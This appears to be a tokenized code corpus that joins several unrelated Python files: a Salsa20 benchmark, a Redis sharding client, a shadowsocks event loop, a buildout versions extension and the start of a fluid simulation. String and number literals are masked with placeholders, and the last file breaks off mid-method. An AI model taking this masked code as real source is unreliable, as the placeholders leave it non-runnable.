in message_lens : <EOL> print ( msg_len_fmt % msg_len , end = "<STR_LIT:U+0020>" ) <EOL> print ( ) <EOL> for nRounds in [ <NUM_LIT:8> , <NUM_LIT:20> , <NUM_LIT> ] : <EOL> names [ nRounds ] = "<STR_LIT>" + repr ( nRounds ) + "<STR_LIT::>" <EOL> print ( namefmt % names [ nRounds ] , end = "<STR_LIT:U+0020>" ) <EOL> speeds [ nRounds ] = { } <EOL> if nRounds <= <NUM_LIT:20> : lens = message_lens <EOL> else : lens = message_lens [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> for msg_len in lens : <EOL> message = b'<STR_LIT:\x00>' * msg_len <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , <NUM_LIT:20> ) <EOL> s20 . force_nRounds ( nRounds ) <EOL> nreps = <NUM_LIT:1> <EOL> duration = <NUM_LIT> <EOL> while duration < <NUM_LIT:5> : <EOL> nreps = int ( ceil ( nreps * min ( <NUM_LIT:4> , <NUM_LIT> / duration ) ) ) <EOL> start = time ( ) <EOL> for i in range ( nreps ) : <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> duration = time ( ) - start <EOL> speeds [ nRounds ] [ msg_len ] = msg_len * nreps / duration <EOL> print ( speed_fmt % speeds [ nRounds ] [ msg_len ] , end = "<STR_LIT:U+0020>" ) <EOL> stdout . flush ( ) <EOL> print ( ) <EOL> return passed <EOL> salsa20_modules = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> salsa20_test_classes = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> def import_salsa ( module_names , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> for name in module_names : <EOL> if name == "<STR_LIT>" : <EOL> try : <EOL> global pureSalsa20 <EOL> import pureSalsa20 <EOL> salsa20_test_classes [ name ] = patch_pureSalsa20 ( ) <EOL> salsa20_modules [ name ] = pureSalsa20 <EOL> except : <EOL> if verbose : print ( "<STR_LIT>" ) <EOL> elif name == "<STR_LIT>" : <EOL> try : <EOL> global pySalsa20 <EOL> import pySalsa20 <EOL> global libSalsa20 <EOL> libSalsa20 = pySalsa20 . loadLib ( '<STR_LIT>' ) <EOL> salsa20_test_classes [ name ] = patch_pySalsa20 ( ) <EOL> salsa20_modules [ name ] = pySalsa20 <EOL> except : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , repr ( n ) , "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> passed = True <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> asked = argv [ <NUM_LIT:1> : ] <EOL> else : <EOL> asked = [ name for name in salsa20_modules ] <EOL> import_salsa ( asked ) <EOL> for name in asked : <EOL> module = salsa20_modules [ name ] <EOL> if module : <EOL> passed &= test ( module , name ) <EOL> elif len ( argv ) > <NUM_LIT:1> : <EOL> passed = False <EOL> import_salsa ( asked , verbose = True ) <EOL> if not passed : <EOL> from sys import exit <EOL> exit ( <NUM_LIT:1> ) </s>
<s> import re <EOL> import functools <EOL> import redis <EOL> from multiprocessing . dummy import Pool as ThreadPool <EOL> from redis . client import Lock <EOL> from redis . sentinel import Sentinel <EOL> from . commands import SHARD_METHODS <EOL> from . _compat import basestring , iteritems <EOL> from . hashring import HashRing <EOL> from . helpers import format_servers <EOL> from . pipeline import Pipeline <EOL> from . sentinel import SentinelRedis <EOL> _findhash = re . compile ( '<STR_LIT>' , re . I ) <EOL> def list_or_args ( keys , args ) : <EOL> try : <EOL> iter ( keys ) <EOL> if isinstance ( keys , basestring ) : <EOL> keys = [ keys ] <EOL> except TypeError : <EOL> keys = [ keys ] <EOL> if args : <EOL> keys . extend ( args ) <EOL> return keys <EOL> class RedisShardAPI ( object ) : <EOL> def __init__ ( self , servers , hash_method = '<STR_LIT>' , sentinel = None , strict_redis = False ) : <EOL> self . nodes = [ ] <EOL> self . connections = { } <EOL> self . pool = None <EOL> servers = format_servers ( servers ) <EOL> if sentinel : <EOL> sentinel = Sentinel ( sentinel [ '<STR_LIT>' ] , socket_timeout = sentinel . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> for server_config in servers : <EOL> name = server_config . pop ( '<STR_LIT:name>' ) <EOL> server_config [ "<STR_LIT>" ] = int ( server_config . get ( "<STR_LIT>" , <NUM_LIT:100> ) ) <EOL> if name in self . connections : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if sentinel : <EOL> self . connections [ name ] = SentinelRedis ( sentinel , name ) <EOL> elif strict_redis : <EOL> self . connections [ name ] = redis . StrictRedis ( ** server_config ) <EOL> else : <EOL> self . connections [ name ] = redis . Redis ( ** server_config ) <EOL> server_config [ '<STR_LIT:name>' ] = name <EOL> self . nodes . append ( name ) <EOL> self . ring = HashRing ( self . nodes , hash_method = hash_method ) <EOL> def get_server_name ( self , key ) : <EOL> g = _findhash . match ( key ) <EOL> if g is not None and len ( g . groups ( ) ) > <NUM_LIT:0> : <EOL> key = g . groups ( ) [ <NUM_LIT:0> ] <EOL> name = self . ring . get_node ( key ) <EOL> return name <EOL> def get_server ( self , key ) : <EOL> name = self . get_server_name ( key ) <EOL> return self . connections [ name ] <EOL> def _build_pool ( self ) : <EOL> if self . pool is None : <EOL> self . pool = ThreadPool ( len ( self . nodes ) ) <EOL> def __wrap ( self , method , * args , ** kwargs ) : <EOL> try : <EOL> key = args [ <NUM_LIT:0> ] <EOL> assert isinstance ( key , basestring ) <EOL> except : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> server = self . get_server ( key ) <EOL> f = getattr ( server , method ) <EOL> return f ( * args , ** kwargs ) <EOL> def __wrap_eval ( self , method , script_or_sha , numkeys , * keys_and_args ) : <EOL> if numkeys != <NUM_LIT:1> : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> key = keys_and_args [ <NUM_LIT:0> ] <EOL> server = self . get_server ( key ) <EOL> f = getattr ( server , method ) <EOL> return f ( script_or_sha , numkeys , * keys_and_args ) <EOL> def __wrap_tag ( self , method , * args , ** kwargs ) : <EOL> key = args [ <NUM_LIT:0> ] <EOL> if isinstance ( key , basestring ) and '<STR_LIT:{>' in key : <EOL> server = self . get_server ( key ) <EOL> elif isinstance ( key , list ) and '<STR_LIT:{>' in key [ <NUM_LIT:0> ] : <EOL> server = self . get_server ( key [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % method ) <EOL> method = method . lstrip ( "<STR_LIT>" ) <EOL> f = getattr ( server , method ) <EOL> return f ( * args , ** kwargs ) <EOL> def __getattr__ ( self , method ) : <EOL> if method in SHARD_METHODS : <EOL> return functools . partial ( self . __wrap , method ) <EOL> elif method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return functools . partial ( self . __wrap_eval , method ) <EOL> elif method . startswith ( "<STR_LIT>" ) : <EOL> return functools . partial ( self . __wrap_tag , method ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % method ) <EOL> def brpop ( self , key , timeout = <NUM_LIT:0> ) : <EOL> if not isinstance ( key , basestring ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> server = self . get_server ( key ) <EOL> return server . brpop ( key , timeout ) <EOL> def blpop ( self , key , timeout = <NUM_LIT:0> ) : <EOL> if not isinstance ( key , basestring ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> server = self . get_server ( key ) <EOL> return server . blpop ( key , timeout ) <EOL> def keys ( self , key ) : <EOL> _keys = [ ] <EOL> for node in self . nodes : <EOL> server = self . connections [ node ] <EOL> _keys . extend ( server . keys ( key ) ) <EOL> return _keys <EOL> def mget ( self , keys , * args ) : <EOL> """<STR_LIT>""" <EOL> args = list_or_args ( keys , args ) <EOL> server_keys = { } <EOL> ret_dict = { } <EOL> for key in args : <EOL> server_name = self . get_server_name ( key ) <EOL> server_keys [ server_name ] = server_keys . get ( server_name , [ ] ) <EOL> server_keys [ server_name ] . append ( key ) <EOL> for server_name , sub_keys in iteritems ( server_keys ) : <EOL> values = self . connections [ server_name ] . mget ( sub_keys ) <EOL> ret_dict . update ( dict ( zip ( sub_keys , values ) ) ) <EOL> result = [ ] <EOL> for key in args : <EOL> result . append ( ret_dict . get ( key , None ) ) <EOL> return result <EOL> def mset ( self , mapping ) : <EOL> """<STR_LIT>""" <EOL> servers = { } <EOL> for key , value in mapping . items ( ) : <EOL> server_name = self . get_server_name ( key ) <EOL> servers . setdefault ( server_name , [ ] ) <EOL> servers [ server_name ] . append ( ( key , value ) ) <EOL> for name , items in servers . items ( ) : <EOL> self . connections [ name ] . mset ( dict ( items ) ) <EOL> return True <EOL> def flushdb ( self ) : <EOL> for node in self . nodes : <EOL> server = self . connections [ node ] <EOL> server . flushdb ( ) <EOL> def lock ( self , name , timeout = None , sleep = <NUM_LIT:0.1> ) : <EOL> """<STR_LIT>""" <EOL> return Lock ( self , name , timeout = timeout , sleep = sleep ) <EOL> def pipeline ( self ) : <EOL> return Pipeline ( self ) <EOL> def script_load ( self , script ) : <EOL> shas = [ ] <EOL> for node in self . nodes : <EOL> server = self . connections [ node ] <EOL> shas . append ( server . script_load ( script ) ) <EOL> if not all ( x == shas [ <NUM_LIT:0> ] for x in shas ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return shas [ <NUM_LIT:0> ] <EOL> def haskey ( self , key ) : <EOL> server_name = self . get_server_name ( key ) <EOL> return key in self . connections [ server_name ] <EOL> def __delitem__ ( self , key ) : <EOL> server_name = self . get_server_name ( key ) <EOL> del self . connections [ server_name ] [ key ] </s>
<s> from __future__ import absolute_import , division , print_function , with_statement <EOL> import os <EOL> import time <EOL> import socket <EOL> import select <EOL> import errno <EOL> import logging <EOL> from collections import defaultdict <EOL> from shadowsocks import shell <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> POLL_NULL = <NUM_LIT> <EOL> POLL_IN = <NUM_LIT> <EOL> POLL_OUT = <NUM_LIT> <EOL> POLL_ERR = <NUM_LIT> <EOL> POLL_HUP = <NUM_LIT> <EOL> POLL_NVAL = <NUM_LIT> <EOL> EVENT_NAMES = { <EOL> POLL_NULL : '<STR_LIT>' , <EOL> POLL_IN : '<STR_LIT>' , <EOL> POLL_OUT : '<STR_LIT>' , <EOL> POLL_ERR : '<STR_LIT>' , <EOL> POLL_HUP : '<STR_LIT>' , <EOL> POLL_NVAL : '<STR_LIT>' , <EOL> } <EOL> TIMEOUT_PRECISION = <NUM_LIT:10> <EOL> class KqueueLoop ( object ) : <EOL> MAX_EVENTS = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . _kqueue = select . kqueue ( ) <EOL> self . _fds = { } <EOL> def _control ( self , fd , mode , flags ) : <EOL> events = [ ] <EOL> if mode & POLL_IN : <EOL> events . append ( select . kevent ( fd , select . KQ_FILTER_READ , flags ) ) <EOL> if mode & POLL_OUT : <EOL> events . append ( select . kevent ( fd , select . KQ_FILTER_WRITE , flags ) ) <EOL> for e in events : <EOL> self . _kqueue . control ( [ e ] , <NUM_LIT:0> ) <EOL> def poll ( self , timeout ) : <EOL> if timeout < <NUM_LIT:0> : <EOL> timeout = None <EOL> events = self . _kqueue . control ( None , KqueueLoop . MAX_EVENTS , timeout ) <EOL> results = defaultdict ( lambda : POLL_NULL ) <EOL> for e in events : <EOL> fd = e . ident <EOL> if e . filter == select . KQ_FILTER_READ : <EOL> results [ fd ] |= POLL_IN <EOL> elif e . filter == select . KQ_FILTER_WRITE : <EOL> results [ fd ] |= POLL_OUT <EOL> return results . items ( ) <EOL> def register ( self , fd , mode ) : <EOL> self . _fds [ fd ] = mode <EOL> self . _control ( fd , mode , select . KQ_EV_ADD ) <EOL> def unregister ( self , fd ) : <EOL> self . _control ( fd , self . _fds [ fd ] , select . KQ_EV_DELETE ) <EOL> del self . _fds [ fd ] <EOL> def modify ( self , fd , mode ) : <EOL> self . unregister ( fd ) <EOL> self . register ( fd , mode ) <EOL> def close ( self ) : <EOL> self . _kqueue . close ( ) <EOL> class SelectLoop ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _r_list = set ( ) <EOL> self . _w_list = set ( ) <EOL> self . _x_list = set ( ) <EOL> def poll ( self , timeout ) : <EOL> r , w , x = select . select ( self . _r_list , self . _w_list , self . _x_list , <EOL> timeout ) <EOL> results = defaultdict ( lambda : POLL_NULL ) <EOL> for p in [ ( r , POLL_IN ) , ( w , POLL_OUT ) , ( x , POLL_ERR ) ] : <EOL> for fd in p [ <NUM_LIT:0> ] : <EOL> results [ fd ] |= p [ <NUM_LIT:1> ] <EOL> return results . items ( ) <EOL> def register ( self , fd , mode ) : <EOL> if mode & POLL_IN : <EOL> self . _r_list . add ( fd ) <EOL> if mode & POLL_OUT : <EOL> self . _w_list . add ( fd ) <EOL> if mode & POLL_ERR : <EOL> self . _x_list . add ( fd ) <EOL> def unregister ( self , fd ) : <EOL> if fd in self . _r_list : <EOL> self . _r_list . remove ( fd ) <EOL> if fd in self . _w_list : <EOL> self . _w_list . remove ( fd ) <EOL> if fd in self . _x_list : <EOL> self . _x_list . remove ( fd ) <EOL> def modify ( self , fd , mode ) : <EOL> self . unregister ( fd ) <EOL> self . register ( fd , mode ) <EOL> def close ( self ) : <EOL> pass <EOL> class EventLoop ( object ) : <EOL> def __init__ ( self ) : <EOL> if hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = select . epoll ( ) <EOL> model = '<STR_LIT>' <EOL> elif hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = KqueueLoop ( ) <EOL> model = '<STR_LIT>' <EOL> elif hasattr ( select , '<STR_LIT>' ) : <EOL> self . _impl = SelectLoop ( ) <EOL> model = '<STR_LIT>' <EOL> else : <EOL> raise Exception ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _fdmap = { } <EOL> self . _last_time = time . time ( ) <EOL> self . _periodic_callbacks = [ ] <EOL> self . _stopping = False <EOL> logging . debug ( '<STR_LIT>' , model ) <EOL> def poll ( self , timeout = None ) : <EOL> events = self . _impl . poll ( timeout ) <EOL> return [ ( self . _fdmap [ fd ] [ <NUM_LIT:0> ] , fd , event ) for fd , event in events ] <EOL> def add ( self , f , mode , handler ) : <EOL> fd = f . fileno ( ) <EOL> self . _fdmap [ fd ] = ( f , handler ) <EOL> self . _impl . register ( fd , mode ) <EOL> def remove ( self , f ) : <EOL> fd = f . fileno ( ) <EOL> del self . _fdmap [ fd ] <EOL> self . _impl . unregister ( fd ) <EOL> def add_periodic ( self , callback ) : <EOL> self . _periodic_callbacks . append ( callback ) <EOL> def remove_periodic ( self , callback ) : <EOL> self . _periodic_callbacks . remove ( callback ) <EOL> def modify ( self , f , mode ) : <EOL> fd = f . fileno ( ) <EOL> self . _impl . modify ( fd , mode ) <EOL> def stop ( self ) : <EOL> self . _stopping = True <EOL> def run ( self ) : <EOL> events = [ ] <EOL> while not self . _stopping : <EOL> asap = False <EOL> try : <EOL> events = self . poll ( TIMEOUT_PRECISION ) <EOL> except ( OSError , IOError ) as e : <EOL> if errno_from_exception ( e ) in ( errno . EPIPE , errno . EINTR ) : <EOL> asap = True <EOL> logging . debug ( '<STR_LIT>' , e ) <EOL> else : <EOL> logging . error ( '<STR_LIT>' , e ) <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> continue <EOL> for sock , fd , event in events : <EOL> handler = self . _fdmap . get ( fd , None ) <EOL> if handler is not None : <EOL> handler = handler [ <NUM_LIT:1> ] <EOL> try : <EOL> handler . handle_event ( sock , fd , event ) <EOL> except ( OSError , IOError ) as e : <EOL> shell . print_exception ( e ) <EOL> now = time . time ( ) <EOL> if asap or now - self . _last_time >= TIMEOUT_PRECISION : <EOL> for callback in self . _periodic_callbacks : <EOL> callback ( ) <EOL> self . _last_time = now <EOL> def __del__ ( self ) : <EOL> self . _impl . close ( ) <EOL> def errno_from_exception ( e ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( e , '<STR_LIT>' ) : <EOL> return e . errno <EOL> elif e . args : <EOL> return e . args [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def get_sock_error ( sock ) : <EOL> error_number = sock . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) <EOL> return socket . error ( error_number , os . strerror ( error_number ) ) </s>
<s> """<STR_LIT>""" <EOL> from flask_restplus . inputs import * <EOL> from . my_inputs import boolean </s>
<s> import os <EOL> import logging <EOL> import pkgutil <EOL> import pkg_resources <EOL> import ConfigParser <EOL> import re <EOL> import zc . buildout <EOL> import config_enhance <EOL> import subprocess <EOL> import sys <EOL> __ALL__ = [ "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT>" ] <EOL> EGG_URI_RE = re . compile ( "<STR_LIT>" ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class PlatformVersions ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , buildout ) : <EOL> '''<STR_LIT>''' <EOL> self . buildout = buildout <EOL> self . config_section = None <EOL> self . source_section = None <EOL> self . sources = None <EOL> self . target_section = None <EOL> self . platform_env_var = None <EOL> def parse_config ( self ) : <EOL> self . load_config_section_name ( ) <EOL> self . load_platform_env_var ( ) <EOL> self . load_source_section ( ) <EOL> self . load_source_list ( ) <EOL> self . load_target_section ( ) <EOL> def load_platform_env_var ( self ) : <EOL> if self . _config : <EOL> platform_env_var = self . _config . get ( "<STR_LIT>" , None ) <EOL> if platform_env_var : <EOL> platform_env_var = platform_env_var . strip ( ) <EOL> if len ( platform_env_var ) == <NUM_LIT:0> : <EOL> platform_env_var = None <EOL> self . platform_env_var = platform_env_var <EOL> def load_config_section_name ( self ) : <EOL> self . config_section = self . buildout [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> self . _config = self . buildout [ self . config_section ] <EOL> except : <EOL> self . _config = None <EOL> def load_source_section ( self ) : <EOL> self . source_section = self . _get_platform ( ) <EOL> def load_source_list ( self ) : <EOL> source_list = [ ] <EOL> if self . _config : <EOL> source_str = self . _config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for name in source_str . split ( "<STR_LIT:\n>" ) : <EOL> name = name . strip ( ) <EOL> if len ( name ) : <EOL> source_list . append ( name ) <EOL> for source in source_list : <EOL> LOG . info ( "<STR_LIT>" , source ) <EOL> self . sources = source_list <EOL> else : <EOL> self . sources = [ ] <EOL> return source_list <EOL> def load_target_section ( self ) : <EOL> if '<STR_LIT>' in self . buildout [ '<STR_LIT>' ] : <EOL> self . target_section = self . buildout [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> else : <EOL> self . target_section = '<STR_LIT>' <EOL> def _get_platform_from_env ( self ) : <EOL> platform_env = None <EOL> if self . platform_env_var : <EOL> platform_env = os . getenv ( self . platform_env_var , None ) <EOL> if platform_env is not None and len ( platform_env ) > <NUM_LIT:0> : <EOL> LOG . debug ( "<STR_LIT>" , self . platform_env_var , platform_env ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , self . platform_env_var ) <EOL> return platform_env <EOL> def _get_platform_from_config ( self ) : <EOL> if self . _config : <EOL> platform_env = self . _config . get ( "<STR_LIT>" , None ) <EOL> if platform_env : <EOL> platform_env = platform_env . strip ( ) <EOL> if len ( platform_env ) == <NUM_LIT:0> : <EOL> platform_env = None <EOL> if platform_env is None : <EOL> LOG . error ( "<STR_LIT:%s>" , "<STR_LIT>" ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> else : <EOL> LOG . info ( "<STR_LIT>" , self . config_section , "<STR_LIT>" , platform_env ) <EOL> else : <EOL> platform_env = None <EOL> return platform_env <EOL> def _get_platform ( self ) : <EOL> '''<STR_LIT>''' <EOL> platform_env = self . _get_platform_from_env ( ) <EOL> if not platform_env : <EOL> platform_env = self . _get_platform_from_config ( ) <EOL> return platform_env <EOL> def load_platform_versions ( self ) : <EOL> new_versions = { } <EOL> cp = ConfigParser . ConfigParser ( ) <EOL> for file_name in self . sources : <EOL> _load_config ( cp , file_name ) <EOL> config_enhance . enhance ( cp ) <EOL> if cp . has_section ( self . source_section ) : <EOL> new_versions . update ( cp . items ( self . source_section ) ) <EOL> else : <EOL> LOG . warn ( "<STR_LIT>" , self . source_section ) <EOL> LOG . warn ( "<STR_LIT>" ) <EOL> for section in cp . sections ( ) : <EOL> LOG . info ( "<STR_LIT>" , section ) <EOL> return new_versions <EOL> def load_develop_packages ( self ) : <EOL> pkgs = [ ] <EOL> if self . buildout is not None : <EOL> buildout_section = self . buildout . get ( "<STR_LIT>" , None ) <EOL> if buildout_section is not None : <EOL> develop_str = buildout_section . get ( "<STR_LIT>" , None ) <EOL> if develop_str is not None : <EOL> develop_paths = [ vv for vv in develop_str . split ( ) if len ( vv ) ] <EOL> if len ( develop_paths ) : <EOL> develop_pkgs = lookup_develop_distributions ( develop_paths ) <EOL> pkg_names = [ dd for dd in develop_pkgs ] <EOL> pkgs . extend ( pkg_names ) <EOL> if self . _config is not None : <EOL> package_string = self . _config . get ( "<STR_LIT>" , None ) <EOL> if package_string is not None : <EOL> pkgs . extend ( [ ( vv . strip ( ) , None ) for vv in package_string . split ( ) ] ) <EOL> return pkgs <EOL> def load_composite_versions ( self ) : <EOL> cur_versions = dict ( self . buildout [ self . target_section ] ) <EOL> new_versions = self . load_platform_versions ( ) <EOL> new_versions . update ( cur_versions ) <EOL> for pkg in self . load_develop_packages ( ) : <EOL> if pkg [ <NUM_LIT:1> ] is None : <EOL> LOG . info ( "<STR_LIT>" , pkg ) <EOL> new_versions . pop ( pkg [ <NUM_LIT:0> ] , None ) <EOL> else : <EOL> LOG . info ( "<STR_LIT>" , pkg [ <NUM_LIT:0> ] , pkg [ <NUM_LIT:1> ] ) <EOL> new_versions [ pkg [ <NUM_LIT:0> ] ] = pkg [ <NUM_LIT:1> ] <EOL> self . versions = new_versions <EOL> return self . versions <EOL> def apply_new_versions ( self ) : <EOL> '''<STR_LIT>''' <EOL> target = self . buildout [ self . target_section ] <EOL> target . clear ( ) <EOL> target . update ( self . versions ) <EOL> zc . buildout . easy_install . default_versions ( self . versions ) <EOL> for k , v in self . versions . iteritems ( ) : <EOL> LOG . debug ( "<STR_LIT>" , k , v ) <EOL> def apply_to_buildout ( self ) : <EOL> self . parse_config ( ) <EOL> self . load_composite_versions ( ) <EOL> self . apply_new_versions ( ) <EOL> def read_package_name_from_setup_py ( path ) : <EOL> try : <EOL> setup_py = os . path . join ( path , "<STR_LIT>" ) <EOL> if os . path . exists ( setup_py ) : <EOL> cmd = [ sys . executable , "<STR_LIT>" , "<STR_LIT>" , setup_py , "<STR_LIT>" , "<STR_LIT>" ] <EOL> env = { "<STR_LIT>" : "<STR_LIT::>" . join ( sys . path ) } <EOL> proc = subprocess . Popen ( cmd , env = env , stdout = subprocess . PIPE ) <EOL> result = proc . communicate ( ) <EOL> vv = result [ <NUM_LIT:0> ] <EOL> if proc . returncode != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" % ( "<STR_LIT:U+0020>" . join ( cmd ) , proc . returncode ) ) <EOL> return parse_setup_py_version_output ( vv ) <EOL> except ( Exception , IOError ) : <EOL> LOG . exception ( "<STR_LIT>" , setup_py ) <EOL> def parse_setup_py_version_output ( output ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( output . split ( ) [ - <NUM_LIT:2> : ] ) <EOL> def read_package_name_from_pkg_resources ( path ) : <EOL> try : <EOL> vv = pkg_resources . find_distributions ( path ) <EOL> if vv is not None : <EOL> return vv . split ( ) <EOL> except ( Exception , IOError ) : <EOL> LOG . exception ( "<STR_LIT>" % path ) <EOL> def lookup_develop_distributions ( paths ) : <EOL> dists = [ ] <EOL> for path in paths : <EOL> pkg = read_package_name_from_setup_py ( path ) <EOL> if pkg is None : <EOL> pkg = read_package_name_from_pkg_resources ( path ) <EOL> if pkg is None : <EOL> LOG . error ( "<STR_LIT>" , path ) <EOL> else : <EOL> dists . append ( pkg ) <EOL> return dists <EOL> def _load_resource ( uri ) : <EOL> mm = EGG_URI_RE . match ( uri ) <EOL> if mm : <EOL> dd = mm . groupdict ( ) <EOL> egg_name = dd [ "<STR_LIT>" ] <EOL> path = dd [ "<STR_LIT:path>" ] <EOL> data = pkgutil . get_data ( egg_name , path ) <EOL> return data <EOL> elif "<STR_LIT>" in uri : <EOL> import urllib2 <EOL> return urllib2 . urlopen ( uri ) . read ( ) <EOL> else : <EOL> return file ( uri ) . read ( ) <EOL> def _load_config ( cc , uri ) : <EOL> content = _load_resource ( uri ) <EOL> import StringIO <EOL> buf = StringIO . StringIO ( content ) <EOL> cc . readfp ( buf , uri ) <EOL> def start ( buildout ) : <EOL> platform = PlatformVersions ( buildout ) <EOL> platform . apply_to_buildout ( ) <EOL> def finish ( buildout ) : <EOL> pass </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import compressible . BC as BC <EOL> from compressible . problems import * <EOL> import compressible . eos as eos <EOL> import mesh . patch as patch <EOL> from simulation_null import NullSimulation , grid_setup , bc_setup <EOL> from compressible . unsplitFluxes import * <EOL> from util import profile <EOL> class Variables ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , idens = - <NUM_LIT:1> , ixmom = - <NUM_LIT:1> , iymom = - <NUM_LIT:1> , iener = - <NUM_LIT:1> ) : <EOL> self . nvar = <NUM_LIT:4> <EOL> self . idens = idens <EOL> self . ixmom = ixmom <EOL> self . iymom = iymom <EOL> self . iener = iener <EOL> self . irho = <NUM_LIT:0> <EOL> self . iu = <NUM_LIT:1> <EOL> self . iv = <NUM_LIT:2> <EOL> self . ip = <NUM_LIT:3> <EOL> class BCProp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , xl_prop , xr_prop , yl_prop , yr_prop ) : <EOL> self . xl = xl_prop <EOL> self . xr = xr_prop <EOL> self . yl = yl_prop <EOL> self . yr = yr_prop <EOL> class Simulation ( NullSimulation ) : <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> my_grid = grid_setup ( self . rp , ng = <NUM_LIT:4> ) <EOL> my_data = patch . CellCenterData2d ( my_grid ) <EOL> patch . define_bc ( "<STR_LIT>" , BC . user , is_solid = False ) <EOL> bc , bc_xodd , bc_yodd = bc_setup ( self . rp ) <EOL> self . solid = BCProp ( int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) , <EOL> int ( patch . bc_props [ self . rp . get_param ( "<STR_LIT>" ) ] ) ) <EOL> my_data . register_var ( "<STR_LIT>" , bc ) <EOL> my_data . register_var ( "<STR_LIT>" , bc ) <EOL> my_data . register_var ( "<STR_LIT>" , bc_xodd ) <EOL> my_data . register_var ( "<STR_LIT>" , bc_yodd ) <EOL> my_data . set_aux ( "<STR_LIT>" , self . rp . get_param ( "<STR_LIT>" ) ) <EOL> my_data . set_aux ( "<STR_LIT>" , self . rp . get_param ( "<STR_LIT>" ) ) <EOL> my_data . create ( ) <EOL> self . cc_data = my_data <EOL> aux_data = patch . CellCenterData2d ( my_grid ) <EOL> aux_data . register_var ( "<STR_LIT>" , bc_yodd ) <EOL> aux_data . register_var ( "<STR_LIT>" , bc ) <EOL> aux_data . create ( ) <EOL> self . aux_data = aux_data <EOL> self . vars = Variables ( idens = my_data . vars . index ( "<STR_LIT>" ) , <EOL> ixmom = my_data . vars . index ( "<STR_LIT>" ) , <EOL> iymom = my_data . vars . index ( "<STR_LIT>" ) , <EOL> iener = my_data . vars . index ( "<STR_LIT>" ) ) <EOL> exec ( self . problem_name + '<STR_LIT>' ) <EOL> if self . verbose > <NUM_LIT:0> : print ( my_data ) <EOL> def compute_timestep ( self ) : <EOL> """<STR_LIT>""" <EOL> cfl = self . rp . get_param ( "<STR_LIT>" ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> xmom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> u = xmom / dens <EOL> v = ymom / dens <EOL> e = ( ener - <NUM_LIT:0.5> * dens * ( u * u + v * v ) ) / dens <EOL> gamma = self . rp . get_param ( "<STR_LIT>" ) <EOL> p = eos . pres ( gamma , dens , e ) <EOL> cs = np . sqrt ( gamma * p / dens ) <EOL> xtmp = self . cc_data . grid . dx / ( abs ( u ) + cs ) <EOL> ytmp = self . cc_data . grid . dy / ( abs ( v ) + cs ) <EOL> self . dt = cfl * min ( xtmp . min ( ) , ytmp . min ( ) ) <EOL> def evolve ( self ) : <EOL> """<STR_LIT>""" <EOL> tm_evolve = self . tc . timer ( "<STR_LIT>" ) <EOL> tm_evolve . begin ( ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> grav = self . rp . get_param ( "<STR_LIT>" ) <EOL> myg = self . cc_data . grid <EOL> Flux_x , Flux_y = unsplitFluxes ( self . cc_data , self . aux_data , self . rp , <EOL> self . vars , self . solid , self . tc , self . dt ) <EOL> old_dens = dens . copy ( ) <EOL> old_ymom = ymom . copy ( ) 